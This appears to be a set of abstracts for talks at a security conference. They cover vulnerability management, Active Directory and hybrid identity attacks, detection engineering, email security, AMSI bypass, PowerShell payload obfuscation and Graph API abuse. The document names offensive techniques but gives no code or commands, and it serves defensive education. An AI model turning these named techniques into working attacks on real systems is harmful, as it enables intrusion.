Vulnerability scanning has been a staple in cybersecurity for over two decades. Despite its long-standing presence, many organizations still struggle with effectively conducting scans, assessing discovered vulnerabilities, and prioritizing remediation efforts. Furthermore, the emergence of new security products — such as Breach and Attack Simulation (BAS) and External Attack Surface Management (EASM) — has added another layer of complexity, leaving businesses uncertain about whether to invest in these tools and how to maximize their effectiveness.

With limited resources, organizations face the ongoing challenge of deciding which cybersecurity products and services should be prioritized. A poor selection can lead to wasted budgets, while improper deployment may prevent organizations from realizing the full potential of their investments. Drawing from our extensive experience in over 100+ Red Team engagements, this talk will explore the best use cases for various security tools in real-world scenarios and demonstrate how integrating these tools with Red Team Assessment can serve as an effective Proof of Concept (PoC) for evaluating their true impact.

Security issues with Active Directory have been discussed for many years. It's been 18 years since the "Pass The Hash" attack technique emerged. Have we really completely eliminated these security issues? For example, starting with Windows 11 24H2, NTLM authentication is being phased out, but does that mean Kerberos cannot be attacked? As enterprise architectures gradually shift toward hybrid identity authentication (such as Entra ID and SAML), these vulnerabilities seem to be merging into a larger attack surface.

In this session, we will review the history of Active Directory attacks over the years and introduce related technologies. We will explore various attack methods that arise at the intersection of AD and cloud-based Azure & Entra ID hybrid identity authentication. Using more relaxed and simple concepts, we aim to help everyone quickly understand these potential vulnerabilities and attack vectors, hoping to provide a more comprehensive understanding of these weaknesses to manage related risks within enterprises.

In response to the increasingly complex and changing network threats, enterprise networks often exhibit high heterogeneity with diverse architectures, operating systems, and applications. This diversity challenges the application of a single detection logic. Detection Engineering has emerged as a crucial theme, enabling the design of flexible detection rules tailored to specific environments through systematic methods. By abstracting attack behaviors into characteristic patterns, this approach remains adaptable to rapid changes. This presentation explores the core concepts and practices of Detection Engineering, demonstrated with real-world cases. We'll also discuss using frameworks like MITRE ATT&CK to deconstruct and locate potential detection points in attack behaviors.

This talk will be based on TeamT5's extensive experience in providing Managed Detection and Response (MDR) services, exploring the challenges and pain points encountered during the threat hunting process. Through real-world case studies, we will discuss the obstacles faced in live environments and how threat hunting techniques can be leveraged to detect traces of Advanced Persistent Threat (APT) groups, especially in response to their evolving attack strategies.

Analyze the cybersecurity risks enterprises may face when managing both cloud and on-premises environments from a Blue Team perspective using real case study. Explore potential improvements based on relevant security frameworks and use the Cyber Defense Matrix (CDM) to assess applicable measures at each stage. Align real incidents with the CDM framework to illustrate actionable steps, helping security managers explore different aspects of hybrid cloud security governance.

Cybersecurity admin always busy, and it's only getting busier! In today's digital age, companies face increasing cybersecurity threats, making vulnerability management essential. From traditional IT maintenance to advanced , how to leverage the existing solutions, here's how to enhance overall security:

Regular Scanning and Assessment: Continuously perform vulnerability scans and risk assessments to identify and fix potential threats in real-time.

Prioritize Critical Vulnerabilities: Set priorities based on the severity of vulnerabilities and their impact on business, focusing resources on fixing high-risk vulnerabilities.

Use Automated Tools: Utilize advanced automated tools to improve the efficiency of vulnerability detection and remediation, reducing human errors.

Through those practices, applying these strategies tailored to your industry, you can effectively manage vulnerabilities, enhance overall security, and protect critical assets from cyber threats.

In this presentation, I will share with the audience the process and significance of applying for membership in FIRST (Forum of Incident Response and Security Teams). As global information security threats become increasingly severe, ASUS is committed to providing secure and reliable products and services to our global users and partners.

Throughout this session, I will explain how to use the SIM3 v2 interim Self Assessment Tool to conduct a comprehensive self-evaluation, fully understanding the maturity of our CSIRT/PSIRT and devising improvement plans. I will also discuss how we identified suitable sponsors for recommendations and on-site visits, ensuring the completeness of membership application materials. Additionally, I will detail the process of filling out the FIRST Membership Interest Form and the New Full Member Team Application, from expressing interest to formally submitting the application, ensuring each step is carried out smoothly.

Finally, I will sharing after joining FIRST member, including leveraging the FIRST MISP threat intelligence platform, participating in Special Interest Groups (SIGs), and FIRST events. These resources and opportunities will greatly enhance our response capabilities and professional growth. Through this sharing, I hope to help everyone better understand the significance and process of joining FIRST.

In today's rapidly evolving digital landscape, High-Performance Computing (HPC) has become a core technology across various fields, from scientific research to financial analysis, all relying on its powerful computational capabilities. However, with technological advancements, security threats have also grown increasingly complex, highlighting the importance of a thorough examination of the security of HPC environments. This presentation will focus on the NIST SP 800-223 standard, providing an in-depth analysis of the security architecture, threat assessment, and security posture of high-performance computing. The talk will cover the background of NIST SP 800-223 and its significance in HPC security, followed by a discussion on how to establish a robust security architecture to guard against various potential threats. Subsequently, we will delve into the major security threats currently facing HPC environments, including the characteristics and impacts of both internal and external attacks, and offer effective countermeasures. Additionally, the presentation will emphasize the concept of security posture, exploring how organizations can assess and enhance their protective capabilities within high-performance computing.

This session will explain the CHT Security’s 2024 cybersecurity incident handling statistics, using significant cases as examples to analyze the challenges faced by enterprises. Moreover, this session will emphasize key protection points such as network perimeter defense, intranet protection, and personnel security training, and discuss the importance of vulnerability management and supply chain risk.

The main topic is to introduce the SRM, our cybersecurity monitoring and response platform. This part is going to demonstrate how to accelerate response speed, enhance defense in depth, and reduce cybersecurity risks by integrating with the implementation of SOC, MDR, and SOAR. Finally, it will provide enterprises with recommended solutions to effectively address cybersecurity challenges through practical cases and best practices.

Email services are a critical part of an organization's daily operations, making them a frequent target for attackers through phishing and email spoofing. While various security mechanisms exist to mitigate these risks, their complexity often leads to misconfigurations. Furthermore, since email services can function without them, these mechanisms are overlooked, leaving systems exposed to threats.

This talk will provide a comprehensive exploration of email security mechanisms, examining their intended use, common configuration mistakes, the gap between practical implementation and RFC standards, and the future of these mechanisms. We will focus on preventing spoofing attacks and enhancing the security of email transmission. Finally, by analyzing real-world cases, we will offer practical recommendations to help effectively address these challenges.

As threats continue to intensify, threat actors employ increasingly stealthy infection techniques to gain reverse shells and perform lateral movement within corporate networks. Among these, fileless attack strategies have become a primary method for bypassing even the most advanced endpoint defenses. By abusing native system services—such as PowerShell and LoLBins—in orchestrated attacks, adversaries can escalate privileges, leverage BYOVD (Bring Your Own Vulnerable Driver) techniques to disable core endpoint protections, and implant persistent backdoors.

To address the multi-layered abuse of native services mentioned above, Microsoft introduced AMSI (Antimalware Scan Interface) in Windows 10, deploying it across multiple vulnerable risk architectures within the system. This provides a more precise semantic scan to enable collaborative defense, becoming the main line of defense against early-stage attack threats. ... But, is it really effective?

In this session, we will begin by discussing a paper from CrowdStrike that raises concerns about the AMSI architecture design. We will guide the audience through a reverse engineering approach to break down the PowerShell + AMSI defense framework, exploring The Good, The Bad, and The Ugly. This will involve analyzing the underlying interaction and collaboration process of PowerShell’s architectural components, transforming it into practical and effective exploitation techniques seen in the wild. In terms of detection, we will explore whether multi-layered hooks can mitigate these bypass techniques, helping blue team members gain a deeper understanding of the PowerShell engine.

This session will delve into the configuration and application of Microsoft security products, covering multiple platforms such as Defender, Intune, and Entra ID. We will provide detailed explanations on how to effectively configure and utilize these platforms to protect enterprises from common cyber threats and enhance overall cybersecurity resilience.

We will also share past attack cases, illustrating how Microsoft products and third-party tools can be leveraged for defense and investigation. For instance, enterprises often face phishing emails impersonating senior executives or multi-layer redirection phishing attacks exploiting open redirects on well-known websites. In these cases, we will analyze how Microsoft products perform in defending against such attacks, discussing their advantages, such as high integration and robust threat detection capabilities, while also acknowledging their shortcomings, including operational complexity and limited configuration flexibility.

PowerShell is a good tool to administrate your Windows machine and it's good for malicious actors as well. Malicious actors often use PowerShell to launch both local and remote payloads and usually want their code to be executed without detection and obfuscation. In this session, I will discuss how to use the invocation expression to launch the malicious payload and how to obfuscate your invocation.

This guide delves into how red team exercises can effectively enhance the defensive capabilities of the blue team, fostering a more resilient security framework. Red team exercises are not just about testing defenses but also serve as a crucial mechanism for uncovering potential weaknesses within the organization.

The discussion will cover the core processes and techniques of red team exercises, including simulated attack methods for initial access, privilege escalation, and lateral movement, along with demonstrations of common attack scenarios observed in real-world engagements.

Additionally, the guide will explore how to integrate red team exercise results into an organization’s security culture, leveraging cross-departmental collaboration and security awareness initiatives to build a continuously improving defense system.

Microsoft Graph API is a powerful tool that enables users to quickly, repeatedly, and automatically streamline workflows. However, it has also become a valuable asset for hackers as an entry point for attacks.

In this session, we will explore the capabilities of Microsoft Graph API and demonstrate how attackers leverage these features at various stages of an intrusion. Additionally, we will introduce GraphRunner, a commonly used PowerShell tool among hackers, and explain how it helps them gain access to a victim’s tenant to achieve their objectives.

Finally, we will discuss methods for detecting and identifying malicious use of Microsoft Graph API, as well as strategies to prevent such attacks.